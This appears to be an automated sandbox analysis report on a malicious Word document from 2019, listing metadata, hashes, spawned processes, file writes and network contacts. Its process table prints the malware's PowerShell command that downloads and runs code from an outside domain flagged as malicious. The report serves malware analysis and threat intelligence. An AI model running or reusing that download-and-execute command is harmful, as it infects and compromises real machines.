File name: | Nuovo_documento_75.doc |
Full analysis: | https://app.any.run/tasks/067f4ed4-2d1d-4996-91ae-327fcc551317 |
Verdict: | Malicious activity |
Analysis date: | October 14, 2019, 08:48:58 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Fri Oct 11 18:18:00 2019, Last Saved Time/Date: Mon Oct 14 13:24:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | EF8EC9565BF33FFC01BE397A982EC693 |
SHA1: | 789A54475EBDD56E851DA0658DD94ADE27B5D9FD |
SHA256: | 95876DE3FB8620E2CB051050B594DD6B6B3DACC8D465773C38845F9B62705395 |
SSDEEP: | 3072:lvaU+HscWycwdtQNclQdIkIqWDEcAbCGB74/DIk5Sr:ha1shhwoNclQbIqWDEcAmS4rIK2 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:10:14 12:24:00 |
CreateDate: | 2019:10:11 17:18:00 |
TotalEditTime: | 2.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 3 |
LastModifiedBy: | Administrator |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Administrator |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1552 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Nuovo_documento_75.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3180 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object Net.WebClient).DownloadString('http://jes.dhinsuranceservices.com/?need=stafhxt&vid=dpec10&78570')); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1552 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRCA40.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3180 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SU0KLX102ALKS8NNW2UA.temp | — | |
MD5:— | SHA256:— | |||
1552 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ovo_documento_75.doc | pgc | |
MD5:82E5FD12CB16E5C962C57819CC1FA6E5 | SHA256:101E14571FC7C7E53BA25A01BBA5F098E13686E002AEB82C16396B9F9157E6A9 | |||
3180 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1552 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C6B7DDC2A370439C847AC7C535B1864B | SHA256:079F131EF6E4145DA212B56FC1C3A5F652833387971C3F247398F1330239CC38 | |||
3180 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39e401.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3180 | powershell.exe | GET | — | 185.189.151.22:80 | http://jes.dhinsuranceservices.com/?need=stafhxt&vid=dpec10&78570 | CH | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3180 | powershell.exe | 185.189.151.22:80 | jes.dhinsuranceservices.com | SOFTplus Entwicklungen GmbH | CH | malicious |
Domain | IP | Reputation |
---|---|---|
jes.dhinsuranceservices.com |
| malicious |